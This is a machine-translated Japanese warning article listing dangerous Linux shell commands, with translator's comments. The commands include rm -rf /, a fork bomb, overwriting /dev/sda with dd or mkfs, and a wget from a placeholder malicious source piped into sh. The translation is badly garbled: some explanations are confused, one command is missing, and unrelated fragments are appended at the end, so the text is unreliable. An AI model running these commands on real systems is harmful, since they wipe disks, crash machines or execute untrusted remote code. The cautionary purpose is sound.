Linuxのコマンドラインは便利で効率的、そして楽しいですが、特に危険なことがわからない場合は特に危険です。以下のコマンドは通常、極端にばかげたプレーをするための許可ではありません;普通のユーザーアイデンティティの下では、彼ら自身の1エーカーの3ポイントセラーの破壊!
1、rm-rfコマンド
rm-rfコマンドは、フォルダとその内容を削除する最も速い方法の1つです。ちょっとした間違いや無知が回復不可能なシステムを崩壊させる可能性があります。以下は、rmコマンドのオプションの一部です。
rmコマンドは通常、Linuxでファイルを削除するために使用されます。
rm-rコマンドは、空のフォルダであってもフォルダを再帰的に削除します。 (注釈:個人的には、これは間違っているべきだと思います。常識的に言えば、「空でないフォルダでも」べきです。)
rm-fコマンドは、‘読み取り専用を要求せずに削除できます。ファイル(’)。 (注釈:Linuxのファイル削除では、ファイルが読み取り専用かどうかは気にせず、親ディレクトリに書き込み権限があるかどうかを気にしてください。したがって、-fパラメーターは単に確認を1つずつ削除する必要はないという意味です。オリジナルのrmコマンドは実際にはプロンプトを削除しませんが、一般配布では削除確認を要求するために-iパラメーターに別名でrmを追加し、-fはこのプロンプトを抑制します。)
rm- Rf /:ルートディレクトリ内のすべてのルートを強制的に削除します。 (つまり、削除が完了した後は、……は何もありません。)
rm-rf *:現在のディレクトリ内のすべてのファイルを強制的に削除します。
rm-rf。:現在のフォルダとそのサブフォルダを強制的に削除します。
これからは、rm-rfコマンドを実行するときに注意してください。 rm-iエイリアスを' .bashrc'ファイルペア‘ rm‘コマンドで作成すると、‘ rm‘コマンドを使用してファイルを削除するときに事故を防ぐことができます。 (注釈:ほとんどのディストリビューションでは既にこれを行っています。そうでない場合はそうしてください。-fパラメーターを使用する前に、自分が何をしているのかを検討する必要があります。!翻訳者には血と涙のレッスンがあります。) >
2、:(){::&};:コマンド
これはフォーク爆弾の例です。具体的な操作は‘:‘と呼ばれる関数を定義することです。それは2回、前景に1回とバックグラウンドに1回呼び出されます。システムがクラッシュするまで繰り返し実行されます。
試してもよろしいですか?会社の公式サーバーで実験しないでください。~~
3、Command> /dev /sda
上記のコマンドは、‘コマンドの出力を書き込みます。ブロックデバイス/dev /sda。この操作により、ブロックデバイス内のすべてのデータブロックがコマンドによって書き込まれた元のデータに置き換えられ、ブロックデバイス全体のデータが失われます。
4、mvフォルダ/dev /null
このコマンドは、いくつかの‘フォルダを/dev /nullに移動します。 Linuxでは、/dev /nullまたはnullデバイスは特殊ファイルであり、そこに書き込まれたデータはすべて消去され、その後書き込み操作は成功します。 (注釈:これはブラックホールです。もちろん、フォルダをブラックホールに移動しても、データ復旧ソフトウェアの償還が妨げられることはないため、実際に完全に破棄するには、特別なソフトウェアまたは完全な技術が必要です。 - mdash;削除するものが確実にあることを確認しています。)上記のコマンドを実行すると、Userディレクトリのすべての内容が/dev /nullに移動されます。どちらもブラックホールに関与しています(null)。
5、wgethttp://malicious_source-osh
上記のコマンドは(おそらく)悪意のあるソースからスクリプトをダウンロードして実行します。 Wgetコマンドはスクリプトをダウンロードし、shは(無条件に)ダウンロードしたスクリプトを実行します。
注意:ダウンロードパッケージやスクリプトのソースには常に注意を払う必要があります。信頼できる場所からダウンロードされたスクリプト/プログラムのみを使用してください。 (注釈:それで、あなたは本当にあなたが何をしているのか知っていますか?このニーズに関しては、私のアプローチはそれを黙らせることです。それから私は書いたものを読み、それを実装するかどうかを考えます。 )
6、のmkfs.ext3は/dev /sdaに
ブロックデバイス&lsquoフォーマットする上記のコマンド; SDA&rsquoを;、あなたは確かに上記のブロックの実行中にあなたのコマンドを知っていますデバイス(ハードドライブ)はフォーマットされた、まったく新しいものです!データがない場合、システムは回復不能な段階に陥っています。 (注釈:通常は/dev /sdaなどのデバイスを直接使用しないでください。ローデバイスとして使用されている場合を除き、通常はsda1、sda2、およびその他のパーティションに分割する必要があります。 Mkfsはブロックデバイスやパーティションに壊滅的な影響を与え、上記のデータは消滅します。)
7、 上記のコマンドはファイルの内容を空にするためによく使われます。通常はコマンド出力の記録にも使用されますが、実行前に出力ファイルが空であるか存在しないことを確認してください。そうしないと、元のファイルを復元することはできません。また、実際に使用したいのは'>>'で、ファイルを更新するのではなく、新しい出力をファイルに追加することです。)上記の実行でエラーを入力したり、無意味な入力を行ったりすると、'> xt.conf'のようなコマンドが設定ファイルまたは他のシステム設定ファイルを上書きします。 8、^ foo ^ bar このコマンドは、あまり知られていないLinuxコマンド - パート3で説明されています。これは、以前に実行したコマンドをコマンド全体を再生せずに編集するために使用します。しかし、foobarコマンドを使用するときに、元のコマンドを変更する危険性を十分にチェックしないと、これは本当の問題を引き起こす可能性があります。 (注釈:実際には、この種のトリックは翻訳者が考えるものであり、先史時代には無用で有害な「隠れたハッカー」がいくつか残っていました。) 9、ddif = /dev /randomof = /Dev /sda 上記のコマンドは、データを消去するためにブロックデバイスsdaにランダムなジャンクファイルを書き込みます。もちろん!あなたのシステムは混乱していて回復不可能な状態にあるかもしれません。 (注釈:ブラックホールへのmvはデータを完全に削除することができないと言うことを忘れないでください?それからこのコマンドはあなたに完全に削除された方法を与えることです!もちろん、保険のために、あなたは複数回上書きすることができます。) 10 、hiddenコマンド 以下のコマンドは、実際には上記の最初のコマンドです(rm-rf)。ここのコードは16進数で隠されており、無知なユーザーがだまされる可能性があります。端末で次のコマンドを実行すると、ルートパーティションが消去されることがあります。 このコマンドは、実際の危険性は通常隠れており、簡単には検出されないことを示しています。あなたはいつもあなたがしていることと起こることに注意しなければなりません。未知のソースからコードをコンパイル/実行しないでください。
zh-CN"],null,[1],zh-TW"]]]
このプログラムと出力を使用して、waitpidの使用法と特性を分析します。 waitpidをWNOHANGノンブロッキング親プロセス状態に設定し、最初にwaitpidが呼び出されたとき:この時点では子
◆インストールしてログイン:ログイン、シャットダウン、停止、再起動、インストール、マウント、アンマウント、CHSH、終了、最後 ファイル処理◆:ファイル、MKDIR、grepを、DD、見つける、MV
でファイルを暗号化します。今日ますます注目を集めるネットワークセキュリティ問題において、どのように送信プロセスでUbuntuシステムデータのセキュリティを確保するのですか?この記事ではUbuntuシス
LinuxサーバーオペレーティングシステムのログファイルIBMが開発したJFSは、もともとAIXオペレーティングシステム上で開発され、ログベースのバイトレベルのトランザクション指向の高性能ファイルシス